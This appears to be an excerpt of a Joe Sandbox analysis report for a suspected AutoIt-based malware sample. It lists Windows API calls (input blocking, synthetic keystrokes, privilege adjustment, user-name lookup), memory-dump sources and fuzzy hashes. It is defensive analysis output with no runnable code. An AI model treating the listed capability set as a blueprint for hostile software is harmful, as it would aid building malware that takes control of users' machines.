                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                            • String ID:
                                                                                                            • API String ID: 3429775523-0
                                                                                                            • Opcode ID: e6aea6654b8e6aff4be6f1a5bea7e3602688bcb8a230e02c9ca530b4bfcec2ea
                                                                                                            • Instruction ID: e6521362dd8f36c27e385f59b21c9511b1d3b669ba55af88e69312f4cfb59597
                                                                                                            • Opcode Fuzzy Hash: e6aea6654b8e6aff4be6f1a5bea7e3602688bcb8a230e02c9ca530b4bfcec2ea
                                                                                                            • Instruction Fuzzy Hash: 6FF0F475950309FBDB00DFE49C8AAAEBBBCEB08604F504565E501E6281E774AA448A60
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(00D828E9,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000,?,00D828E9), ref: 00D74D09
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,00D74CBE,00D828E9,00E188B8,0000000C,00D74E15,00D828E9,00000002,00000000,?,00D828E9), ref: 00D74D10
                                                                                                            • ExitProcess.KERNEL32 ref: 00D74D22
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 7dd82f67e221404b1878c26a0f888dd7db7aaaa1d6d55b8675c18b5a19b801ef
                                                                                                            • Instruction ID: 4734078ddefad4d6491f48c06c1458c466f1ee66d9b878a8f78d2e27fafd2fd1
                                                                                                            • Opcode Fuzzy Hash: 7dd82f67e221404b1878c26a0f888dd7db7aaaa1d6d55b8675c18b5a19b801ef
                                                                                                            • Instruction Fuzzy Hash: 28E0B631010288AFCF22BF54DD5AA583B69EB41791B158014FC59DA222EB35ED52CBB0
                                                                                                            APIs
                                                                                                            • GetUserNameW.ADVAPI32(?,?), ref: 00DAD28C
                                                                                                            Strings
Memory Dump Source
• Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
• Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
Similarity
• API ID:
• String ID: Variable is not of type 'Object'.$p#
• API String ID: 0-1086706999
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 00DC6918
• FindClose.KERNEL32(00000000), ref: 00DC6961
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00DD4891,?,?,00000035,?), ref: 00DC37E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00DD4891,?,?,00000035,?), ref: 00DC37F4
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
APIs
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00DBB25D
• keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00DBB270
Similarity
• API ID: InputSendkeybd_event
• String ID:
• API String ID: 3536248340-0
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00DB11FC), ref: 00DB10D4
• CloseHandle.KERNEL32(?,?,00DB11FC), ref: 00DB10E9
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00D86766,?,?,00000008,?,?,00D8FEFE,00000000), ref: 00D86998
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
Similarity
• API ID:
• String ID:
• API String ID: 0-3916222277
APIs
• BlockInput.USER32(00000001), ref: 00DCEABD
                                                                                                            Similarity
                                                                                                            • API ID: BlockInput
                                                                                                            • String ID:
                                                                                                            • API String ID: 3456056419-0
                                                                                                            • Opcode ID: e13efce41dfb24d324dcb6cf54fc99baa130f13a19c7f8219181349b51ec4560
                                                                                                            • Instruction ID: a6181240a5e1722365a5b62ff94e29aaefc848296922ce0f431697dfd3e66159
                                                                                                            • Opcode Fuzzy Hash: e13efce41dfb24d324dcb6cf54fc99baa130f13a19c7f8219181349b51ec4560
                                                                                                            • Instruction Fuzzy Hash: F5E01A712102059FC710EF69D844E9AB7E9EF98760F00841AFC49CB361DA70E8458BB0
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00D703EE), ref: 00D709DA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 1dc1b269eb96b91a5f9ddd88ad970df37d133df3b179bb78e8b378e348d198a6
                                                                                                            • Instruction ID: 2e509bf343e71a02aa2c695c7bdab33ce609e5e65a959463c09a9d9adcac4d81
                                                                                                            • Opcode Fuzzy Hash: 1dc1b269eb96b91a5f9ddd88ad970df37d133df3b179bb78e8b378e348d198a6
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 0-4108050209
                                                                                                            • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                            • Instruction ID: 7849803d48e115a792cd99507e97bd5f1208e6aa11246358c65b3d1e861c3e6d
                                                                                                            • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                            • Instruction Fuzzy Hash: 4E51327160C705AADB388568C85EBBE6399DB02300F1CCD1AD98EC7282F611DE01E7B3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 0&
                                                                                                            • API String ID: 0-2523485602
                                                                                                            • Opcode ID: 5cb5c1f2c6a7e1eda798c3d8390170284d7ed8fa7785d2c6bf1a985b76205673
                                                                                                            • Instruction ID: fdb41a9707f9be9459b7190992db20242f59c9d82857e2bcfc6afebd2625650b
                                                                                                            • Opcode Fuzzy Hash: 5cb5c1f2c6a7e1eda798c3d8390170284d7ed8fa7785d2c6bf1a985b76205673
                                                                                                            • Instruction Fuzzy Hash: 0E21B7327206118BD728CF79C82367E73E5A754310F19862EE4A7D77D1DE35A904DB90
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 3a9f007d86b4316014f52f3ffa37c1c668590fcdc997a583f3a57ff91324a5aa
                                                                                                            • Instruction ID: f2f79a75662dec92e8b0a564b88d68f7c75f3706836f57c64b47cf6a78d0c7f1
                                                                                                            • Opcode Fuzzy Hash: 3a9f007d86b4316014f52f3ffa37c1c668590fcdc997a583f3a57ff91324a5aa
                                                                                                            • Instruction Fuzzy Hash: 74323821D29F014DD723A638DC22335A649AFB73C5F25D737F81AF5AA5EB29C4838210
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f6f5bb7fbcf155606d2ea05084c802451d82036c653d0bfec037af0799b6fc94
                                                                                                            • Instruction ID: 9eb10787d6cf286e507360ad8b5963a915365db0100f6b290da32450ab54fed0
                                                                                                            • Opcode Fuzzy Hash: f6f5bb7fbcf155606d2ea05084c802451d82036c653d0bfec037af0799b6fc94
                                                                                                            • Instruction Fuzzy Hash: 3E322631A241158BCF28CF2DC4906BD7BA1EF86320F2DA56AD4DA9B291D334DD81DB71
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 56dbf1673c5193c3b3776b73898c20549eab0e636ddf929622c6dea4520bfd97
                                                                                                            • Instruction ID: 7cfa0a1a8fafa6bc541b3ac702bce74b97dbd46447df0eff2e9ea648ab000623
                                                                                                            • Opcode Fuzzy Hash: 56dbf1673c5193c3b3776b73898c20549eab0e636ddf929622c6dea4520bfd97
                                                                                                            • Instruction Fuzzy Hash: 02229EB0A00609DFDF14CF64E881AAEB7B5FF44301F244629EC56A7295EB36E914CB70
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 99c253ca9925f1631cc642fe5955173a28e0f20d59eaf0fb4f46ac81a4ae862f
                                                                                                            • Instruction ID: e6281e0d0e2b689c8892a9fa3d8a81cc8525783f5af55a1cf7eacd0cb8d9d407
                                                                                                            • Opcode Fuzzy Hash: 99c253ca9925f1631cc642fe5955173a28e0f20d59eaf0fb4f46ac81a4ae862f
                                                                                                            • Instruction Fuzzy Hash: C002C5B0E00605EFDF04DF64D881AADBBB5FF44304F548169E8569B291EB31EA24CBB5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: de43b356f4b1a3361520081543c74c52915e5f3bcdc94e00c452e3bf9534f4f4
                                                                                                            • Instruction ID: 9fef1c8f38dfce66b95ffe538b2da639053fa86bfb139810a9e433a8c7f0aa2e
                                                                                                            • Opcode Fuzzy Hash: de43b356f4b1a3361520081543c74c52915e5f3bcdc94e00c452e3bf9534f4f4
                                                                                                            • Instruction Fuzzy Hash: F2B1F620D2AF414DD723A6398835336B79CAFBB6D5F52D71BFC1674E62EB2185838140
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                            • Instruction ID: 37ea4ab05e4cacd7d84c87c1ca95d4134ecc9d7749e794dbf7e2be000e4da322
                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                            • Instruction Fuzzy Hash: E49188761080A34ADB29463E857507EFFE15A923A131E479EE4FACB1C1FE20C958DA30
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                            • Instruction ID: 69baef3f77723618a9de301e7c4ea3bce38784cb609bf99e887383b092d01fde
                                                                                                            • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                                                                            • Instruction Fuzzy Hash: B391857A2090A34ADB2D467E857403EFFE15B923A131E879ED4FACA1C1FE14C659D630
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9676f6744dcd3619438f22f9e4e9700b4e0ea568174b8b675d851e3a0a8b275f
                                                                                                            • Instruction ID: dccd11a5a13e0e850905a07a87e72107a98a14fb1572fb1373127a7629fa2075
                                                                                                            • Opcode Fuzzy Hash: 9676f6744dcd3619438f22f9e4e9700b4e0ea568174b8b675d851e3a0a8b275f
                                                                                                            • Instruction Fuzzy Hash: CF617A31748709A6EE389A288C95BBF2394DF45700F1CCD1AE98EDB281F611DE42C775
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f3e7f2e076d494f5cf5f5e9960df8ee590015cf5df91046c2562b22c32b62695
                                                                                                            • Instruction ID: 5a750f957e01577ff9e7482676028d6aa9e341b68010950a7f9a5aebdfa1d617
                                                                                                            • Opcode Fuzzy Hash: f3e7f2e076d494f5cf5f5e9960df8ee590015cf5df91046c2562b22c32b62695
                                                                                                            • Instruction Fuzzy Hash: C5618A3164870AE6DE384A684855BBF2394EF42704F1CCD5AF98EDB281FA12DD42D375
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction ID: c3f210acbcc492a8aa6456e2132dc30875c45f9ddaea1c54a526e53175011fea
                                                                                                            • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                                                                            • Instruction Fuzzy Hash: C181863A5080A349DB6D463D853403EFFE15A923A131E879ED4FACB1C1FE24C559E630
                                                                                                            APIs
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DD2B30
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00DD2B43
                                                                                                            • DestroyWindow.USER32 ref: 00DD2B52
                                                                                                            • GetDesktopWindow.USER32 ref: 00DD2B6D
                                                                                                            • GetWindowRect.USER32(00000000), ref: 00DD2B74
                                                                                                            • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00DD2CA3
                                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00DD2CB1
                                                                                                            • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2CF8
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00DD2D04
                                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00DD2D40
                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D62
                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D75
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D80
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00DD2D89
                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2D98
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00DD2DA1
                                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2DA8
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00DD2DB3
                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2DC5
                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00DEFC38,00000000), ref: 00DD2DDB
                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00DD2DEB
                                                                                                            • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00DD2E11
                                                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00DD2E30
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD2E52
                                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00DD303F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                                            • API String ID: 2211948467-2373415609
                                                                                                            • Opcode ID: 2d6dad6d7e387c27819515bcf27ada4f7107407fcf53ffa4147ebf9e16383621
